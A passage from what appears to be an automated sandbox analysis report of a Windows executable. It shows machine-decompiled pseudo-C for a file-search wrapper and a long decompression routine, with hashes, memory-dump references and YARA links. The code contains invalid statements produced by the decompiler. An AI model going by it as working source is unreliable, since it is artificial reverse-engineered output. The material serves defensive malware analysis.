MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,0040850C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402202

Strings

C:\Users\user\Desktop, xrefs: 00402193

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\Desktop
API String ID: 123533781-1669384263
Opcode ID: c4af37cbd940ee62ea35c3f930e1cb5653233ac861172c8898dde9906edf9fef
Instruction ID: f4f88eda2e3132aa5920e2584167a74d80893369f9b2333c3bffcb98084fb778
Opcode Fuzzy Hash: c4af37cbd940ee62ea35c3f930e1cb5653233ac861172c8898dde9906edf9fef
Instruction Fuzzy Hash: 44510771A00208BFCB10DFE4C989A9D7BB6AF48318F2085AAF515EB2D1DA799941CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004026FE, Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E004026FE(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402ACB(2), _t19 - 0x1c8) != 0xffffffff) {
					E00405EFE(__edi, _t6);
					_push(_t19 - 0x19c);
					_push(__esi);
					E00405FA0();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x00402716
0x0040272a
0x00402735
0x00402736
0x00402875
0x00402718
0x00402718
0x0040271a
0x0040271c
0x0040271c
0x0040295a
0x00402966

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040270D

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 1f52fb084ee61b3ea00726a5dd0825a0b8941fa7d7abab64623fb9122a17cd1f
Instruction ID: 54a63a0b970f9f74e56537ecc54aa136cf23b82a2183361db5dda5742450debe
Opcode Fuzzy Hash: 1f52fb084ee61b3ea00726a5dd0825a0b8941fa7d7abab64623fb9122a17cd1f
Instruction Fuzzy Hash: 83F0EC72604151DBD700E7A49949DFEB76CDF11324FA0057BE181F20C1CABC8A459B3A

Uniqueness

Uniqueness Score: -1.00%

Function 0040677D, Relevance: .3, Instructions: 334
COMMONCrypto

Download Yara Rule

C-Code - Quality: 79%

			E0040677D(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E00406EEC( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x408400; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x408400; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E00406F54( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M00406EAC))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x40a3e8 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x40a3e8 + __eax * 2) & 0x0000ffff =  *(0x40a3e8 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x40a3e8 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x40a3e8 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x40a3e8 + __eax * 2) & 0x0000ffff =  *(0x40a3e8 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x40a3e8 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E00406EEC( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L163:
												__esi[0x26ea] = __edi;
												__eax = E00406EEC( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L172;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L163;
											}
											L159:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L172;
											} else {
												goto L163;
											}
										case 7:
											L173:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L175;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L182;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L180;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
												L13:
												__eflags =  *0x42e388;
												if( *0x42e388 != 0) {
													L22:
													_t412 =  *0x40a40c; // 0x9
													_t446[4] = _t412;
													_t413 =  *0x40a410; // 0x5
													_t446[4] = _t413;
													_t414 =  *0x42d204; // 0x42db08
													_t446[5] = _t414;
													_t415 =  *0x42d200; // 0x42e308
													_t446[6] = _t415;
													L23:
													 *_t446 =  *_t446 & 0x00000000;
													goto L180;
												} else {
													_t26 = _t448 - 8;
													 *_t26 =  *(_t448 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t416 = 0x42d208;
													goto L15;
													L20:
													 *_t416 = _t438;
													_t416 = _t416 + 4;
													__eflags = _t416 - 0x42d688;
													if(_t416 < 0x42d688) {
														L15:
														__eflags = _t416 - 0x42d444;
														_t438 = 8;
														if(_t416 > 0x42d444) {
															__eflags = _t416 - 0x42d608;
															if(_t416 >= 0x42d608) {
																__eflags = _t416 - 0x42d668;
																if(_t416 < 0x42d668) {
																	_t438 = 7;
																}
															} else {
																_t438 = 9;
															}
														}
														goto L20;
													} else {
														E00406F54(0x42d208, 0x120, 0x101, 0x408414, 0x408454, 0x42d204, 0x40a40c, 0x42db08, _t448 - 8);
														_push(0x1e);
														_pop(_t440);
														_push(5);
														_pop(_t419);
														memset(0x42d208, _t419, _t440 << 2);
														_t450 = _t450 + 0xc;
														_t442 = 0x42d208 + _t440;
														E00406F54(0x42d208, 0x1e, 0, 0x408494, 0x4084d0, 0x42d200, 0x40a410, 0x42db08, _t448 - 8);
														 *0x42e388 =  *0x42e388 + 1;
														__eflags =  *0x42e388;
														goto L22;
													}
												}
											}
											L7:
											_t423 = _t411 - 1;
											if(_t423 == 0) {
												 *_t446 = 0xb;
												goto L180;
											}
											L8:
											if(_t423 != 1) {
												goto L180;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x20;
												if(__ebx >= 0x20) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L26:
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L182;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E00405AF4( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
												_t80 =  &(__esi[1]);
												 *_t80 = __esi[1] - __edi;
												__eflags =  *_t80;
												if( *_t80 == 0) {
													L53:
													__eax = __esi[0x145];
													L54:
													 *__esi = __eax;
												}
												goto L180;
											}
											L32:
											__ecx = __esi[0x26e8];
											__edx =  *(__ebp - 0x30);
											__eflags = __edx - __ecx;
											if(__edx != __ecx) {
												L38:
												__esi[0x26ea] = __edx;
												__eax = E00406EEC( *((intOrPtr*)(__ebp + 8)));
												__edx = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edx - __ecx;
												 *(__ebp - 0x30) = __edx;
												if(__edx >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edx;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edx;
													__eax = __ecx - __edx - 1;
												}
												__edi = __esi[0x26e8];
												 *(__ebp - 0x2c) = __eax;
												__eflags = __edx - __edi;
												if(__edx == __edi) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __edx - __ecx;
													if(__eflags != 0) {
														 *(__ebp - 0x30) = __edx;
														if(__eflags >= 0) {
															__edi = __edi - __edx;
															__eflags = __edi;
															__eax = __edi;
														} else {
															__ecx = __ecx - __edx;
															__eax = __ecx;
														}
														 *(__ebp - 0x2c) = __eax;
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L48;
												}
											}
											L33:
											__eax = __esi[0x26e9];
											__edi =  &(__esi[0x6e8]);
											__eflags = __eax - __edi;
											if(__eax == __edi) {
												goto L38;
											}
											L34:
											__edx = __edi;
											__eflags = __edx - __eax;
											 *(__ebp - 0x30) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											 *(__ebp - 0x2c) = __eax;
											if(__eax != 0) {
												goto L48;
											} else {
												goto L38;
											}
										case 0xb:
											goto L56;
										case 0xc:
											L60:
											__esi[1] = __esi[1] >> 0xa;
											__eax = (__esi[1] >> 0xa) + 4;
											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
												goto L68;
											}
											goto L61;
										case 0xd:
											while(1) {
												L93:
												__eax = __esi[1];
												__ecx = __esi[2];
												__edx = __eax;
												__eax = __eax & 0x0000001f;
												__edx = __edx >> 5;
												__eax = __edx + __eax + 0x102;
												__eflags = __esi[2] - __eax;
												if(__esi[2] >= __eax) {
													break;
												}
												L73:
												__eax = __esi[0x143];
												while(1) {
													L76:
													__eflags = __ebx - __eax;
													if(__ebx >= __eax) {
														break;
													}
													L74:
													__eflags =  *(__ebp - 0x34);
													if( *(__ebp - 0x34) == 0) {
														goto L182;
													}
													L75:
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
													__ecx = __ebx;
													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
													__ebx = __ebx + 8;
													__eflags = __ebx;
												}
												L77:
												__eax =  *(0x40a3e8 + __eax * 2) & 0x0000ffff;
												__eax = __eax &  *(__ebp - 0x40);
												__ecx = __esi[0x144];
												__eax = __esi[0x144] + __eax * 4;
												__edx =  *(__eax + 1) & 0x000000ff;
												__eax =  *(__eax + 2) & 0x0000ffff;
												__eflags = __eax - 0x10;
												 *(__ebp - 0x14) = __eax;
												if(__eax >= 0x10) {
													L79:
													__eflags = __eax - 0x12;
													if(__eax != 0x12) {
														__eax = __eax + 0xfffffff2;
														 *(__ebp - 8) = 3;
													} else {
														_push(7);
														 *(__ebp - 8) = 0xb;
														_pop(__eax);
													}
													while(1) {
														L84:
														__ecx = __eax + __edx;
														__eflags = __ebx - __eax + __edx;
														if(__ebx >= __eax + __edx) {
															break;
														}
														L82:
														__eflags =  *(__ebp - 0x34);
														if( *(__ebp - 0x34) == 0) {
															goto L182;
														}
														L83:
														__ecx =  *(__ebp - 0x38);
														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
														__ecx = __ebx;
														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
														__ebx = __ebx + 8;
														__eflags = __ebx;
													}
													L85:
													__ecx = __edx;
													__ebx = __ebx - __edx;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													 *(0x40a3e8 + __eax * 2) & 0x0000ffff =  *(0x40a3e8 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
													__edx =  *(__ebp - 8);
													__ebx = __ebx - __eax;
													__edx =  *(__ebp - 8) + ( *(0x40a3e8 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
													__ecx = __eax;
													__eax = __esi[1];
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													__ecx = __esi[2];
													__eax = __eax >> 5;
													__edi = __eax >> 0x00000005 & 0x0000001f;
													__eax = __eax & 0x0000001f;
													__eax = __edi + __eax + 0x102;
													__edi = __edx + __ecx;
													__eflags = __edx + __ecx - __eax;
													if(__edx + __ecx > __eax) {
														goto L9;
													}
													L86:
													__eflags =  *(__ebp - 0x14) - 0x10;
													if( *(__ebp - 0x14) != 0x10) {
														L89:
														__edi = 0;
														__eflags = 0;
														L90:
														__eax = __esi + 0xc + __ecx * 4;
														do {
															L91:
															 *__eax = __edi;
															__ecx = __ecx + 1;
															__eax = __eax + 4;
